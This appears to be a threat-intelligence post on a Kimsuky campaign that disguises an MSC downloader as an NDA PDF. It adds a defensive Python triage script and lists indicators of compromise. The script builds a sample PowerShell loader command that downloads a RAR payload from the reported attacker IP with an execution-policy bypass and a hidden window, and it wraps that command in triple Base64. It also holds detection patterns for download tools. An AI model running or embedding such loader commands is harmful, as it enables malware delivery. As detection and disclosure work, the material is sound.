North Korean hacking group Kimsuky (김수키) distributes malware disguised as an NDA document: beware of the NDA.pdf.msc file (2025.5.4)

2025-05-12 Sakai North Korean hacking group Kimsuky distributes malware disguised as an NDA document - beware of the NDA.pdf.msc file (2025.5.4)

https://wezard4u.tistory.com/429482


Kimsuky activity used an NDA.pdf.msc lure: the file carried a Microsoft Edge icon so it appeared to be a PDF, but Windows opens it as a Microsoft Management Console (MSC) file. Because Explorer hides known extensions by default, the name displays as NDA.pdf, which is what makes the double extension work. The embedded content was Base64-encoded three times; once decoded it launched PowerShell, which downloaded password-protected RAR payloads and an UnRAR binary from 109.107.157.107, extracted the follow-on files, and executed script content from the temporary directory. The chain dropped a decoy NDA PDF tied to a blockchain game project, hid the PowerShell or Windows Terminal window, bypassed PowerShell's execution policy, and repeatedly executed the extracted kaptsoli.exe payload. The source reports the SHA-256 bf13fb57e2a0d8e59f9f10dbfc9edf651c70b31f4bea45abf1f085391b162e61 and vendor detections that classify the file as an XML or MSC downloader.
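The following is an added triage example, not code from the original post or from the analysis it summarizes. It walks an MSC console file (which is plain XML), peels stacked Base64 out of every string node and attribute value, and flags decoded content that matches the downloader behaviour described above; it also checks a filename for the document-looking double extension. The embedded console file and loader command are constructed and simplified for this example: only the address 109.107.157.107 is taken from the page, while the archive name, the password, the use of iwr and the MSC node layout are assumptions, and the executable extensions beyond .msc are a generalization of the page's single case.

```python
"""Added example (not code from the original post): triage an MSC console file
for PowerShell hidden behind nested (here triple) Base64, plus the NDA.pdf.msc
double-extension trick. The sample console file is CONSTRUCTED; only the C2 IP
109.107.157.107 comes from the page, every filename and the password are assumed."""
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# A token worth trying as Base64: 40+ chars of the standard alphabet, optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Indicators that a decoded layer is a downloader/loader rather than console data.
SUSPICIOUS = [
    re.compile(r"powershell|pwsh|wt\.exe", re.I),            # host process / Windows Terminal
    re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),   # execution-policy bypass
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),         # hidden window
    re.compile(r"\b(?:DownloadFile|DownloadString|Invoke-WebRequest|iwr|curl)\b", re.I),
    re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),   # raw-IP URL
    re.compile(r"unrar(?:\.exe)?|\.rar\b", re.I),            # RAR staging
]

def _as_text(raw: bytes):
    """Return raw bytes as printable text (UTF-8 first, then UTF-16LE, which
    PowerShell -EncodedCommand uses), or None if neither decoding is clean."""
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text
    return None

def peel_base64(token: str, max_layers: int = 8):
    """Decode Base64 repeatedly while each result is text that is itself Base64.
    Stacked encodings (three in the reported sample) defeat single-pass decoders,
    so keep going until the layer is no longer Base64. Returns (innermost, layers)."""
    current, layers = token, 0
    while layers < max_layers:
        try:
            raw = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break
        text = _as_text(raw)
        if text is None:
            break
        layers += 1
        current = text.strip()
        if not B64_TOKEN.fullmatch(current):
            break
    return current, layers

def scan_msc(xml_text: str):
    """Walk every text node and attribute value of an .msc, peel nested Base64,
    and report decoded content that looks like a loader."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        for value in [elem.text or ""] + list(elem.attrib.values()):
            for token in B64_TOKEN.findall(value):
                decoded, layers = peel_base64(token)
                if layers == 0:
                    continue
                hits = [p.pattern for p in SUSPICIOUS if p.search(decoded)]
                if hits:
                    findings.append({"element": elem.tag, "layers": layers,
                                     "decoded": decoded, "indicators": hits})
    return findings

DOC_EXTS = {"pdf", "doc", "docx", "hwp", "xls", "xlsx", "ppt", "pptx"}
EXEC_EXTS = {"msc", "lnk", "hta", "scr"}  # .msc is the page's case; the rest are assumed extras

def lure_filename_risk(name: str) -> bool:
    """True for document-looking double extensions that Explorer shows without
    the real extension, e.g. NDA.pdf.msc displays as NDA.pdf."""
    parts = name.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[1] in DOC_EXTS and parts[2] in EXEC_EXTS

def _wrap(text: str, layers: int) -> str:
    """Base64-encode `text` `layers` times (only used to build the sample)."""
    for _ in range(layers):
        text = base64.b64encode(text.encode("utf-8")).decode("ascii")
    return text

# Constructed loader command: C2 IP from the page; archive name, password and
# the use of iwr are assumptions for the example.
LOADER_CMD = (
    "powershell -ep bypass -w hidden -c "
    "\"iwr http://109.107.157.107/p.rar -OutFile $env:TEMP\\p.rar; "
    "& $env:TEMP\\UnRAR.exe x -pPASS $env:TEMP\\p.rar $env:TEMP\""
)

# Constructed, heavily simplified MSC; a real console file has many more nodes.
SAMPLE_MSC = f"""<MMC_ConsoleFile ConsoleVersion="3.0">
  <StringTables><StringTable><Strings>
    <String ID="1" Refs="1">Console Root</String>
    <String ID="2" Refs="1">{_wrap(LOADER_CMD, 3)}</String>
  </Strings></StringTable></StringTables>
</MMC_ConsoleFile>"""

if __name__ == "__main__":
    print("double-extension lure:", lure_filename_risk("NDA.pdf.msc"))
    for f in scan_msc(SAMPLE_MSC):
        print(f"{f['element']}: {f['layers']} Base64 layers -> {f['decoded']}")
        print("  indicators:", f["indicators"])
```

Run it directly to see the constructed string node unwrapped through all three layers and the indicators that fire. The peeling loop stops as soon as a layer is no longer clean text that looks like Base64, which is what keeps it from mangling ordinary console strings, and the UTF-16LE fallback matters because PowerShell's -EncodedCommand argument is Base64 over UTF-16LE rather than UTF-8.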

Indicators of Compromise

Type   Value                                                               First Seen   Last Seen
HASH   4ebfb03a1339cb86051ce685c3e09c9…                                    2025-05-12   2025-05-12
HASH   bf13fb57e2a0d8e59f9f10dbfc9edf6…                                    2025-05-12   2025-05-12
HASH   51c83329bb364483f122accf36ebfe76                                    2025-05-12   2025-05-12
IPv4   109.107.157.107                                                     2025-05-12   2025-05-12
